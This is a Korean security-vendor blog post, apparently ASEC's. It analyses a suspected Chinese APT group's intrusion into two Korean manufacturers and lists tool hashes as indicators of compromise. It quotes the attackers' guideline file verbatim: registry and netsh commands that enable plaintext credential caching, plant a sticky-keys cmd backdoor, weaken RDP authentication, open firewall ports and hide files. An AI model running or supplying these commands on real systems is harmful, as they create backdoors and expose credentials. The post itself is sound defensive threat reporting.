Posted By kingkimgim , 2023년 5월 4일

중국 해커 조직의 국내 기업 정보 탈취

최근 SQL 서버나 IIS 웹서버와 같이 외부에서 접근 가능한 취약한 서버를 대상으로 공격하는 침해 사례가 빈번히 확인되고 있다.

이번 사례에서 확인된 피해 기업은 총 2곳으로 반도체 업체와 AI를 활용한 스마트 제조업체이다. 해킹 공격을 수행한 공격 그룹에서 해킹 도구의 사용법이 적힌 중국어 텍스트 파일이 확인되어 샤오치잉과 Dalbit(달빗)과 같이 중국 해커 그룹으로 추정하고 있다.

중국 해커 그룹의 가이드 라인

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
reg add “HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe” /v “Debugger” /t REG_SZ /d “\”c:\windows\system32\cmd.exe\” /z” /f
REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v UserAuthentication /t REG_DWORD /d 0 /f
REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v SecurityLayer /t REG_DWORD /d 0 /f

！！禁止强制名，以管理的身行cmd 行以下命令

Win2012 Can:
bcdedit.exe /set nointegritychecks on

\Easy File Locker （！！！注意：只需要予Access限，其他都不需要，切切）

除1. REG delete “HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Easy file Locker” /f
除2：安目
除3： C:\Users\master\AppData\Roaming\Microsoft\Windows\Start Menu\Programs （快捷方式）

C:/Users/Public/Documents/EFL/rule.ini 藏的定在此
Easy File Locker添加需要藏的文件，只予access限，可文件的藏。

cmd.exe /c reg add “HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /t REG_DWORD /v portnumber /d 3389 /f
cmd.exe /c wmic RDTOGGLE WHERE ServerName=’%COMPUTERNAME%’ call SetAllowTSConnections 1
cmd.exe /c netsh advfirewall firewall add rule name=”RemoteDesktop_Allow” dir=in protocol=TCP action=allow localport=3389 remoteip=any

1.reg add “HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /t REG_DWORD /v portnumber /d 3389 /f \配置端口3389
2.wmic RDTOGGLE WHERE ServerName=’%COMPUTERNAME%’ call SetAllowTSConnections 1 （open terminal, 0 close)
netsh advfirewall firewall add rule name=”RemoteDesktop_Allow” dir=in protocol=TCP action=allow localport=3389 remoteip=any
4.netsh advfirewall firewall show rule name=”RemoteDesktop_Allow”
5. netsh advfirewall firewall del rule name=”RemoteDesktop_Allow”

reg add “HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe” /v “Debugger” /t REG_SZ /d “\”c:\windows\system32\cmd.exe\” /z” /f
REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v UserAuthentication /t REG_DWORD /d 0 /f
REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v SecurityLayer /t REG_DWORD /d 0 /f

[표 1] 해커 그룹이 사용한 해킹 도구 가이드 라인 텍스트 파일

공격자 서버 및 유출 정보

현재 확인된 공격자의 서버는 아래와 같다.

FRP 관리 서버

공격자는 피해 기업 서버에 FRP를 설치하였다. 따라서 [그림 1]의 해당 페이지에는 FRP가 설치된 감염 PC와 공격자가 사용하는 프록시 서버 정보를 확인할 수 있다.

FRP를 이용한 공격 방법은 이전 블로그인 ‘Dalbit’ APT 그룹과 AhnLab TIP 서비스 ‘다양한 원격 제어 도구들을 악용하는 공격 사례 분석 보고서‘에서 자세히 기술하였다.

달빗(Dalbit,m00nlight): 중국 해커 그룹의 APT 공격 캠페인 – ASEC BLOG

0. 개요 해당 내용은 2022년 8월 16일에 공개된 ‘국내 기업 타겟의 FRP(Fast Reverse Proxy) 사용하는 공격 그룹’ 블로그의 연장선으로, 해당 그룹의 행보를 추적한 내용이다. 이 그룹은 과거부터 지금까지 오픈 소스 도구를 주로 사용하고 PDB 등에 정보가 없어 프로파일링의 명확한 특징이 부족했다. 또한 C2(Command&Control) 서버는 국내 기업 서버를 악용하여 피해 기업이 조사를 따로 요청하지 않는 경우 수집할 수 있는 정보가 한정적이었다. 허나 블로그가 공개되고 공격자가 사용 중이던 국내 기업…

국내 기업 타겟의 FRP(Fast Reverse Proxy) 사용하는 공격 그룹 – ASEC BLOG

최근 외부에 노출된 취약한 서버를 시작으로 하여 침투한 공격자가 내부 네트워크까지 장악하는 침해 사고가 국내 기업들을 대상으로 빈번히 이루어지고 있다. 취약한 Atlassian Confluence 서버를 대상으로 하는 공격 사례 국내 의료기관의 취약한 서버를 대상으로 유포된 미터프리터(Meterpreter) 취약한 MySQL 서버를 대상으로 유포 중인 AsyncRAT 악성코드 이번 사례는 IIS 웹서버나 MS Exchange 서버 침해 사고로 기존에 알려진 유형과 동일하나, 개인이 아닌 특정 공격 그룹으로 추정되는 사례를 소개하고자…

파일 서버

해당 서버에는 CobaltStrike, VPN, Remote Control 해킹 도구 등과 많은 로그 파일이 존재한다. 해당 로그 파일은 [그림 2]와 같이 번호로 이뤄진 디렉토리 안에 존재하며, 절취한 로그에는 자격 증명 정보와 네트워크 정보 그리고 기업 내부 자료로 추정되는 정보가 존재한다.

[그림 3] 2023년 03월~ 04월에 유출한 로그(LogFile.txt) 정보 일부

공격자 도구 & IOC

공격자가 사용한 도구 및 서버에서 확인된 도구는 아래와 같다.

웹쉘(WebShell)

Behinder
f8de2e99dc7523d2c83d1a48e844c5ff
77d507d30a155cf315f839db3bf507f7

Aspxspy
dd634ebfba56c1a898c4156ffdea146d

Godzilla
ed6ef17783c667c0c894e6cf7c71c54a
e5b626c4b172065005d04205b026e446

IceSword
a0301c680b257516090e336ca4e29167

자격 증명 탈취(Credential Access)

Mimikatz
825e6e194a9d5e12cbf109b7de07a244
6c9ad4e67032301a61a9897377d9cff8
bb8bdb3e8c92e97e2f63626bc3b254c4
29efd64dd3c7fe1e2b022b7ad73a1ba5

Impacket(Secretsdump)
a7b705e4fb473e7ce32a495b079017b2

네트워크 스캐닝(Network Scanning)

SharpHound
12c70eefa2edba8b420a6d00891c792b
c541c44f41d953899d5734dd1d3b1d78

PortScan
41b61b87cf54821a45e8cf2cbfc852f8

FScan
32421a007f28aacf869a46f714945ad0

지속성 유지(Persistence)

NSSM
beceae2fdc4f7729a93e94ac2ccd78cc

측면 이동(Lateral Movement)

PSexec
421116e8b522898f9d8e1651a8315705

Impacket(WMIExec)
e663e4b83089087d0a7989365b3513c4

RemCom
6983f7001de10f4d19fc2d794c3eb534

프록시 및 VPN 도구(Proxy and VPN Tool)

FRPC
7d9c233b8c9e3f0ea290d2b84593c842
2eead3e509a19002d80f48d431922f1e

FRPC INI(설정 파일)
61616e8948de1bf2b62a34854d655dea
e5273f435c8eab59bc5dbaa5ac11da7b

VPN Gate
e74130971e6f3c3caf56d862a39e750f

PulseSecure
8f9da1466cb5415a45a512341549b12e

원격 제어 도구(Remote Access Tool)

CobaltStrike
5e4fdc376f7dda3744bc331352bbe231
968931d2608f997866e07ce777b41636
2ad284b957ab28277fef534b3698c006

Ladon
006e7290fbae946551f07f6e0319d5de
b3b2c45aef41d94e7491d049d33c56c0

DameWare NT(Remote Control)
b10040dcd1583dadc4bf357eec22a18f

TeamViewer
b71d75f8f79e86add3fdece2c871e34c

ToDesk
7031441687a9548f1a7a08eb1e56f66b

ETC

note.txt(중국어 가이드 라인 파일 원본)
a0ac0624926bfbbf196050783dfbc019

공격자 C2 서버는 아직 연결이 가능한 상태로 피해 기업의 정보가 일부 노출되어 있다. 따라서 2차 피해를 막기 위해 공개하지 않는다.

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

Categories:악성코드 정보

Tagged as:APT,Dalbit,FRP,해커 그룹,중국,샤오치잉,Impacket,NSSM,proxy,vpn,WebShell